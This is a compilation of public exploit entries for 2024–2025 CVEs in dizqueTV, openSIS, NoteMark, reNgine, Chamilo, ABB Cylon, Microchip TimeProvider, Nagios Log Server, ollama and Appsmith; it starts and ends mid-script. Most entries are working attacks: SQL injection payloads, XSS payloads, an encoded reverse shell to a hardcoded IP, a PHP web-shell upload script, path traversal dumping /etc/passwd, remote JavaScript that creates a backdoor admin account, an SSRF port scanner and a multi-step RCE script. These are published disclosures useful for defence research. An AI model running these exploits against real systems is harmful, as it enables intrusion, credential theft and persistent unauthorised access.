parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
parser.add_argument("-u", "--username",type=str,help="username", required=True)
parser.add_argument("-p", "--password",type=str,help="password", required=True)
args = parser.parse_args()
exploit(args.username, args.password, args.target)
main()
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
# Date: 9/21/2024
# Exploit Author: Ahmed Said Saud Al-Busaidi
# Vendor Homepage: https://github.com/vexorian/dizquetv
# Version: 1.5.3
# Tested on: linux
POC:
## Vulnerability Description
dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.
## STEPS TO REPRODUCE
1. go to http://localhost/#!/settings
2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"
3. click on update
4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux
A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php.
GET /Ajax.php?modname=x HTTP/1.1
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
---
FIX: https://github.com/OS4ED/openSIS-Classic/pull/322
# Exploit Title: Stored XSS in NoteMark
# Date: 07/29/2024
# Exploit Author: Alessio Romano (sfoffo)
# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
# Version: 0.13.0 and below
# Tested on: Linux
# References:
https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,
https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,
https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
# CVE: CVE-2024-41819
## Steps to Reproduce
1. Log in to the application.
2. Create a new note or enter a previously created note.
3. Access the note editor functionality from the selected note by clicking
on the "Editor" tab.
4. Input the following payload:
[xss-link](javascript:alert(1))
5. Save the changes.
6. Click on the "Rendered" tab to view the rendered markdown version of the
note. Click on the previously created link to pop the injected alert.
## HTTP Request PoC
PUT /api/notes/<note-uuid>/content HTTP/1.1
Host: localhost:8000
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 34
Sec-Fetch-Site: same-origin
Authorization: Bearer <TOKEN>
[xss-link](javascript:alert(1))
# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS
POC :
1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.
payload :
'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’
# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
# Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
# Exploit Date: September 3, 2024
# Vendor Homepage: https://chamilo.org/
# Software Link: https://chamilo.org/
# Version: 1.11.24 (Beersel)
# Tested Versions: 1.11.24 (Beersel) - August 31, 2023
# CVE ID: CVE-2023-4220
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, File Upload
# CVSS Score: 8.1 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable.
# License: MIT License
# References:
# - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
# - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
# - Vendor Advisory: https://chamilo.org/
import requests
import argparse
from urllib.parse import urljoin
def upload_shell(target_url, payload_name):
upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported")
shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}"
shell_url = urljoin(target_url, shell_path)
# Payload containing the PHP web shell
files = {'bigUploadFile': (payload_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
# Upload the payload
response = requests.post(upload_url, files=files)
if response.status_code == 200:
print("[+] File uploaded successfully!")
print(f"[+] Access the shell at: {shell_url}?cmd=")
else:
print("[-] File upload failed.")
def execute_command(shell_url, cmd):
# Execute the command
response = requests.get(f"{shell_url}?cmd={cmd}")
if response.status_code == 200:
print(f"[+] Command Output:\n{response.text}")
else:
print(f"[-] Failed to execute command at {shell_url}")
if __name__ == "__main__":
# Parse command-line arguments
parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit")
parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)")
parser.add_argument('cmd', help="The command to execute on the remote server")
parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)")
args = parser.parse_args()
# Run the exploit with the provided arguments
upload_shell(args.target_url, args.shell)
# Form the shell URL to execute commands
shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}")
execute_command(shell_url, args.cmd)
# Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'file' GET parameter
through the 'downloadDb.php' script is not properly verified before being used
to download database files. This can be exploited to disclose the contents of
arbitrary and sensitive files via directory traversal attacks.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5831
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
> -H "Cookie: PHPSESSID=xxx"
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
sshd:x:995:992::/var/run/sshd:/bin/false
xuser:x:1000:1000::/home/xuser:
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
mysql:x:993:65534::/var/mysql:
aamtech:x:500:500::/home/aamtech:/bin/sh
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Armando Huesca Prida
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 10/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-43687
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.
# Exploitation Steps:
1- Log in to the device's web management interface.
2- Open the banner configuration panel.
3- Select the "custom banner" feature.
4- Insert the malicious JavaScript payload.
5- Apply and save the system configuration containing the custom banner.
6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.
# Example of malicious JavaScript payload:
<img src=a onerror=alert(1)>
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below:
- [session cookie]
- [malicious JavaScript payload]
- [device IP]
# Exploit - HTTP Request:
POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"
1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"
[malicious JavaScript payload]
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"
applybanner
-----------------------------9680247575877256312575038502--
# End
# Exploit Title: Stored XSS Vulnerability in Nagios Log Server (Privilege Escalation to Admin)
# Date: 2025-04-02
# Exploit Author: Seth Kraft
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-79, CWE-352, CWE-285, CWE-269, CWE-602
# CVSS: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:R/S:C/VC:H/VI:H/VA:H)
# Type: Stored Cross-Site Scripting (XSS), Privilege Escalation
# Exploit Risk: Critical
# Disclosure
For research and authorized testing only. Do not use against systems without permission.
# Description:
A stored XSS vulnerability in Nagios Log Server 2024R1.3.1 allows a low-privileged user to inject
malicious JavaScript into the 'email' field of their profile. When an administrator views the audit logs,
the script executes, resulting in privilege escalation via unauthorized admin account creation.
The vulnerability can be chained to achieve remote code execution (RCE) in certain configurations.
# PoC
1. Log in as a standard (non-admin) user.
2. Navigate to the profile update endpoint:
http://<target-ip>/nagioslogserver/profile/update
3. Inject the following payload into the email field:
```javascript
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
.then(response => response.text())
.then(scriptText => eval(scriptText))
.catch(console.error);
</script>
```
4. Host the xss.js payload on your external server with the following content:
```javascript
(function() {
var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
if (!csrfTokenMatch) return;
var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
var requestBody = "csrf_ls=" + csrfToken +
"&name=backdoor" +
"&email=hacker@example.com" +
"&username=backdoor" +
"&password=Password123!" +
"&password2=Password123!" +
"&auth_type=admin" +
"&apiaccess=1" +
"&language=en_US" +
"&account_type=local";
fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: requestBody
})
.then(response => response.text())
.then(console.log)
.catch(console.error);
})();
```
5. Wait for an administrator to view the audit logs. The JavaScript will execute, creating a new admin account:
Username: backdoor
Password: Password123!
# Exploit Title: ollama 0.6.4 - SSRF
# Date: 2025-04-03
# Exploit Author: sud0
# Vendor Homepage: https://ollama.com/
# Software Link: https://github.com/ollama/ollama/releases
# Version: <=0.6.4
# Tested on: CentOS 8
import argparse
import requests
import json
from urllib.parse import urljoin
def check_port(api_base, ip, port):
api_endpoint = api_base.rstrip('/') + '/api/create'
model_path = "mynp/model:1.1"
target_url = f"https://{ip}:{port}/{model_path}"
payload = {
"model": "mario",
"from": target_url,
"system": "You are Mario from Super Mario Bros."
}
try:
response = requests.post(api_endpoint, json=payload, timeout=10, stream=True)
response.raise_for_status()
for line in response.iter_lines():
if line:
try:
json_data = json.loads(line.decode('utf-8'))
if "error" in json_data and "pull model manifest" in json_data["error"]:
error_msg = json_data["error"]
model_path_list = model_path.split(":", 2)
model_path_prefix = model_path_list[0]
model_path_suffix = model_path_list[1]
model_path_with_manifests = f"{model_path_prefix}/manifests/{model_path_suffix}"
if model_path_with_manifests in error_msg:
path_start = error_msg.find(model_path_with_manifests)
result = error_msg[path_start+len(model_path_with_manifests)+3:] if path_start != -1 else ""
print(f"Raw Response: {result}")
if "connection refused" in error_msg.lower():
print(f"[!] Port Closed - {ip}:{port}")
else:
print(f"[+] Port Maybe Open - {ip}:{port}")
return
except json.JSONDecodeError:
continue
print(f"[?] Unkown Status - {ip}:{port}")
except requests.exceptions.RequestException as e:
print(f"[x] Execute failed: {str(e)}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ollama ssrf - port scan")
parser.add_argument("--api", required=True, help="Ollama api url")
parser.add_argument("-i", "--ip", required=True, help="target ip")
parser.add_argument("-p", "--port", required=True, type=int, help="target port")
args = parser.parse_args()
check_port(args.api, args.ip, args.port)
# Exploit Title: Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
# Exploit Author: Armando Huesca Prida
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 10/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-9054
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-9054
# URL: https://0xhuesca.com/2024/10/cve-2024-9054.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution.
# Exploitation Steps:
1- Perform login into the device's management web interface.
2- Download the device's configuration file.
3- Substitute the "secret_key" value with the malicious payload.
4- Save the new configuration file containing the OS command to be executed.
5- Restore and submit the new configuration.
6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload.
# Example of malicious XML config file:
<?xml version="1.0"?>
[...]
<security>
[...]
<server>
<ip>192.168.1.1</ip>
<secret_key>`ping 192.168.1.20`</secret_key>
[...]
</server>
[...]
</security>
[...]
# Proof of Concept - PoC:
Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request:
- [session cookie]
- [XML configuration file containing the injection on "secret_key" tag]
- [Web account password in clear-text]
- [device IP]
# Exploit - Restore and submit config file HTTP Request:
POST /config_restore HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
Content-Length: 206640
Origin: https://[device IP]
Referer: https://[device IP]/configbackuprestore
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
-----------------------------182708909322642582691204887002
Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
Content-Type: text/plain
[XML configuration file containing the injection on "secret_key" tag]
-----------------------------182708909322642582691204887002
Content-Disposition: form-data; name="pword"
[Web account password in clear-text]
-----------------------------182708909322642582691204887002--
# End
# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE)
# Original Author: Rhino Security Labs
# Exploit Author: Nishanth Anand
# Exploit Date: April 2, 2025
# Vendor Homepage: https://www.appsmith.com/
# Software Link: https://github.com/appsmithorg/appsmith
# Version: Prior to v1.52
# Tested Versions: v1.47
# CVE ID: CVE-2024-55963
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, Database
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system.
import requests
import json
import pyfiglet
import argparse
# Create a banner using pyfiglet
banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title
print(banner)
# Set up argument parser
parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept')
parser.add_argument('-u', '--url', required=True, help='Base URL of the target')
parser.add_argument('command', nargs='?', default='id', help='Command to execute')
args = parser.parse_args()
# Get the base URL and command from the parsed arguments
base_url = args.url
command_arg = args.command
if not base_url.startswith("http://") and not base_url.startswith("https://"):
base_url = "http://" + base_url
# Signup request
signup_url = f"{base_url}/api/v1/users"
signup_data = {
"email": "poc1@poc.com",
"password": "Testing123!"
}
print('Signing up...')
signup_response = requests.post(signup_url, data=signup_data)
signup_response.raise_for_status()
# Login request
login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed
login_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/user/login",
"Cookie": "ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed",
}
login_data = {
"username": "poc1@poc.com", # Adjusted to match the provided request
"password": "Testing123!"
}
# Make the login request without following redirects
print('Logging in...')
login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False)
login_response.raise_for_status()
# Capture the 'Set-Cookie' header if it exists
set_cookie = login_response.headers.get('Set-Cookie')
if set_cookie:
# Split the Set-Cookie header to get the cookie name and value
cookie_name, cookie_value = set_cookie.split(';')[0].split('=')
# Fourth request to create a new workspace
print('Creating a new workspace...')
if set_cookie:
fourth_request_url = f"{base_url}/api/v1/workspaces"
fourth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"Connection": "keep-alive",
"Referer": f"{base_url}/applications",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
fourth_request_data = json.dumps({"name": "Untitled workspace 3"})
fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data)
fourth_response.raise_for_status()
# Extract the 'id' from the response if it exists
try:
response_json = fourth_response.json()
workspace_id = response_json.get("data", {}).get("id")
except ValueError:
print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging
if workspace_id:
fifth_request_url = f"{base_url}/api/v1/applications"
fifth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"Content-Length": "161",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/applications?workspaceId={workspace_id}",
"Cookie": f"{cookie_name}={cookie_value}",
}
fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None})
print('Creating a new application...')
fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data)
fifth_response.raise_for_status()
try:
response_json = fifth_response.json()
application_id = response_json.get("data", {}).get("id")
except ValueError:
print("Response content is not valid JSON:", fifth_response.text)
# Sixth request to get workspace details
if workspace_id:
sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}"
sixth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit",
"Cookie": f"{cookie_name}={cookie_value}",
}
print('Getting workspace details...')
sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers)
sixth_response.raise_for_status()
# Extract all plugin IDs from the response
try:
response_json = sixth_response.json()
plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])]
# Loop through each plugin ID for the seventh request
print(f'Searching for vulnerable postgres database...')
for plugin_id in plugin_ids:
# Seventh request to get the form data for the plugin
seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form"
seventh_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasources/NEW",
"Cookie": f"{cookie_name}={cookie_value}",
}
try:
seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers)
seventh_response.raise_for_status()
# Extracting the port value from the seventh response
try:
seventh_response_json = seventh_response.json()
if 'data' in seventh_response_json and 'form' in seventh_response_json['data']:
form_data = seventh_response_json['data']['form']
if any("postgres" in str(item) for item in form_data):
print(f"Vulnerable postgres database found.")
break
else:
pass
except (ValueError, IndexError) as e:
pass
except requests.exceptions.HTTPError as e:
print(f"Error checking plugin {plugin_id}: {e}")
continue
# Proceed to request 8 after finding "postgres"
# Proceed to request 8 after finding "postgres"
if "postgres" in str(seventh_response_json):
try:
# Try the environments API endpoint
eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true"
eighth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit",
"Cookie": f"{cookie_name}={cookie_value}",
}
print('Getting the workspace details...')
eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers)
eighth_response.raise_for_status()
# Extracting the workspace ID from the eighth response
try:
eighth_response_json = eighth_response.json()
workspace_data = eighth_response_json.get("data", [{}])[0]
workspace_id_value = workspace_data.get("id")
except (ValueError, IndexError):
print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text)
